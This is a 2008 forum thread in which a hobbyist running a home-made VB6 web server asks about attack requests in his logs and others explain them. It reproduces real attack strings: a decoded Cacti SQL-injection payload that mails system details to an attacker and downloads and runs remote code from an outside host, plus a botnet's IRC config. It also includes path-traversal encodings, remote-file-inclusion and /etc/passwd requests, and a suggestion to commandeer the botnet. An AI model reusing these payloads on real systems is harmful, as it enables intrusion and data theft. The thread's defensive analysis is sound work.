| Author | Message | Time |
|---|---|---|
| Ringo | So, i wrote some little vb6 web server awhile back to convert binary data to html pages for d2 players to view, but i noticed today i had the following requests, and am just wundering if anyone knows what they are trying to do? lol [quote] [01:14:00] [Client 0] Querying: \cacti\cmd.php [05:40:40] [Client 0] Querying: \cacti\cmd.php?1+1111)\**\UNION\**\SELECT\**\ 2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR (32,47,115,98,105,110,47,105,102,99,111,110,102,105,103,32,124,32,103,114,101,112,32,105,110,101, 116,32,62,32,47,116,109,112,47,111,117,116,59,32,117,110,97,109,101,32,45,97,32,62,62,32,47,116,109, 112,47,111,117,116,59,32,117,112,116,105,109,101,32,62,62,32,47,116,109,112,47,111,117,116,59,32,99, 97,116,32,47,116,109,112,47,111,117,116,32,124,32,109,97,105,108,32,45,115,32,56,52,46,57,46,57,52,46, 50,51,51,32,104,97,99,107,101,100,32,97,108,101,120,97,97,97,56,57,64,121,97,104,111,111,46,99,111,109, 59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,111,47,116,32,45,79,32, 47,116,109,112,47,116,59,99,104,109,111,100,32,43,120,32,47,116,109,112,47,116,59,47,116,109,112,47,116, 59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,111,47,116,46,112,108,32, 45,79,32,47,116,109,112,47,116,46,112,108,59,112,101,114,108,32,47,116,109,112,47,116,46,112,108,32,62,32,46, 47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null\**\FROM\**\host\*+11111 [05:41:13] Connection From 69.42.162.18:18613 [05:41:13] [Client 0] Querying: \cacti\rra\suntzu.log [/quote] What are they trying to do? hax it? Sry if this is wrong forum, just interested to know what they think they are going to accomplish. edit: Just converted that mumbo jumbo char's to a string and got the following: [code] /sbin/ifconfig | grep inet > /tmp/out; uname -a >> /tmp/out; uptime >> /tmp/out; cat /tmp/out | mail -s XX.X.XX.XXX hacked alexaaa89@yahoo.com;wget www.alexutz.as.ro/t -O /tmp/t; chmod +x /tmp/t;/tmp/t;wget www.alexutz.as.ro/t.pl -O /tmp/t.pl;perl /tmp/t.pl > ./rra/suntzu.log [/code] Lol Aside, XX.X.XX.XXX was my ip [Kp edit: broke up the command line. It broke the table.] | February 6, 2008, 6:22 AM |
| Barabajagal | You should send them an E-Mail telling them to try again, but this time do it right. | February 6, 2008, 7:09 AM |
| Ringo | lol Anyone have any idea what they were trying to get saved to \cacti\rra\suntzu.log? I get the jist they were trying to get my server to email them of success, but i have almost no exp with web server software (hence wrote my own) but surely it cant be that easy to hax a site? All they got from me was "Page can not be found" heh | February 6, 2008, 6:57 PM |
| iago | That looks like a totally automated attack, unless you actually have "cmd.php".. probably somebody scanning random IP ranges. | February 6, 2008, 7:17 PM |
| Ringo | ah, Cool, nothing to worry about then. (nah i dont have any php files, idk any php) They also tryed it the day before i think, because i forgot to add error handling for opening files, because my server crashed with the run time error "bad file number or name" :( thx for info | February 6, 2008, 7:34 PM |
| Kp | I concur, that looks automated. It was meant to mail the IP address, system architecture and kernel version, and uptime to the specified e-mail address. It would then download additional code using wget and execute that. That command line requires tools that're standard on Unix systems, but they're not standard on Windows. The content of that suntzu.log would be whatever was printed by the Perl script. Someone would have to download the script and examine it to find out what it prints. As an aside, whoever wrote that wasn't very good. There's no need to create so many temporary files. | February 7, 2008, 12:21 AM |
| Ringo | Ah ::) To bad for them I guess, that sounds kinda lame :'( Thx for info, at least I know what they were up to now :P Im gonner put some funny text for them in \cacti\cmd.php just incase they do it again. | February 7, 2008, 2:06 AM |
| mynameistmp | If you want to know more, i'd suggest connecting to this ircd: [quote] my @adms=("`aleXutz"); my @canais=("#FreeForAll") $servidor='irc.iceman.ro' unless $servidor; my $porta='9999'; [/quote] Odds are pretty good that you could commandeer the entire botnet. | February 7, 2008, 3:45 AM |
| iago | [quote author=mynameistmp link=topic=17300.msg176179#msg176179 date=1202355947] If you want to know more, i'd suggest connecting to this ircd: [quote] my @adms=("`aleXutz"); my @canais=("#FreeForAll") $servidor='irc.iceman.ro' unless $servidor; my $porta='9999'; [/quote] Odds are pretty good that you could commandeer the entire botnet. [/quote] You'd be well advised to be careful doing that, as well. Make sure you're bouncing through an anonymous proxy (or tor). | February 10, 2008, 7:58 AM |
| Newby | Mmm, tmp is awesome. :) | February 11, 2008, 5:03 AM |
| Ringo | Hm, I got another strange one today (seem to get this one alot) [code] [09:04:11] Connection From 67.19.246.130:29261 [09:04:11] Item Drop Rate Pages Updated In 32ms [09:04:11] [Client 1] Querying: \cgi-bin\firmwarecfg [09:04:11] [Client 1] Connection Closed. [/code] Im guessing this one is automated as well, and is some kind of configeration file? Would it be wise for me to IP ban clients that request files from \cacti\ and \cgi-bin\? I was a little worryed one day somone will request \Project1.vbp :P (so i moved the source code) | February 11, 2008, 9:23 AM |
| Newby | [quote author=Ringo link=topic=17300.msg176291#msg176291 date=1202721792] I was a little worryed one day somone will request \Project1.vbp :P (so i moved the source code) [/quote] I doubt that would ever happen. And if it's possible for that to happen, you're asking for someone here to decode the original message, get your IP, and poke around until we find it and post it here for all of us to enjoy. :P Curious: do you catch ".."? i.e. can I request "\..\..\..\..\..\..\WINDOWS\explorer.exe" | February 11, 2008, 9:58 PM |
| Ringo | [quote author=Newby link=topic=17300.msg176310#msg176310 date=1202767084] [quote author=Ringo link=topic=17300.msg176291#msg176291 date=1202721792] I was a little worryed one day somone will request \Project1.vbp :P (so i moved the source code) [/quote] Curious: do you catch ".."? i.e. can I request "\..\..\..\..\..\..\WINDOWS\explorer.exe" [/quote] Haha, i just tryed with iexporer and got: [code][22:11:38] [Client 0] Querying: \test.txt[/code] Then tryed it from a program i was useing to open pages to view html with, and got: [code][22:26:30] [Client 0] Querying: \..\test.txt[/code] and in the requesting program: [code] [22:26:30] HTTP/1.1 200 OK Date: Mon, 11 Feb 2008 22:26:30 Content-Length: 24 Connection: close Content-Type: text/plain; charset=UTF-8 OMFG this is a test LOL [/code] So, yeah, you could have back pathed to that file :D Not any more tho. :) I was wundering the other day if its possible to back path, wow lol. Thanks for bringing that to my attention :P Is there any other way to back path like that? | February 11, 2008, 10:37 PM |
| iago | If you're removing ../, make sure you also pick up the unicode variations and malformed versions (ie, does .%00./ work? Does ...///../// work? Does ..%ff/ work? There have been countless problems like that plaguing IIS over the years. | February 11, 2008, 11:34 PM |
| Ringo | ooch, thanks Atm im just nurfing it like this: [code] strFilePath = Replace(strFilePath, "/", "\") strFilePath = Replace(strFilePath, "..", "") strFilePath = Replace(strFilePath, "\\", "\") If InStr(1, strFilePath, "D2HTMLServer", vbTextCompare) > 0 Then Call SendWebPage(App.Path & "\Error.html") Exit Sub ElseIf IsValidFile(strFilePath) = False Then Call SendWebPage(App.Path & "\Error.html") Exit Sub End If [/code] IsValidFile() would handle any errors opening the file, mainly checking for invalid characters and removing them (% being one) Im guessing it would be a good idea, next time my cpu is idle, to brute force the dir() function and log any succesfull backpathing? | February 12, 2008, 12:58 AM |
| iago | If you're playing around, don't forget encodings -- Unicode, UTF-8, invalid UTF-8, stuff like that. I suggest writing an IsSubdirOf() function that makes sure you end up in the proper folder. | February 12, 2008, 1:28 AM |
| Ringo | lol, i think somone hates me :P [code] [02:23:49] Connection From 207.150.178.18:8769 [02:23:50] [Client 0] Querying: \index.php? page=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?& [02:24:00] [Client 0] Querying: \wp-content\plugins\pictpress\resize.php? size=..\..\..\..\..\..\..\..\..\..\&path=\etc\passwd%00 [02:24:11] [Client 0] Querying: \tellmatic\include\Classes.inc.php? tm_includepath=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?& [02:24:22] [Client 0] Querying: \includes\functions_mod_user.php? phpbb_root_path=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?& [02:24:33] [Client 0] Querying: \wp-content\plugins\BackUp\Archive\Predicate.php? bkpwp_plugin_path= [02:24:44] [Client 0] Querying: \classes\core\language.php? rootdir=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?& [02:24:55] [Client 0] Querying: \components\com_smf\smf.php? mosConfig_absolute_path=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?& [02:25:06] [Client 0] Querying: \vbgsitemap\vbgsitemap-config.php? base=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?& [02:25:17] [Client 0] Querying: \public_html\modules\Forums\favorites.php? nuke_bb_root_path=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&[/code] | February 15, 2008, 2:44 AM |
| Explicit[nK] | Trying to traverse your directories... lol. | February 15, 2008, 6:26 AM |
| iago | Yeah, I tend to see automated scans daily. I've just started to ignore them. :) | February 15, 2008, 2:22 PM |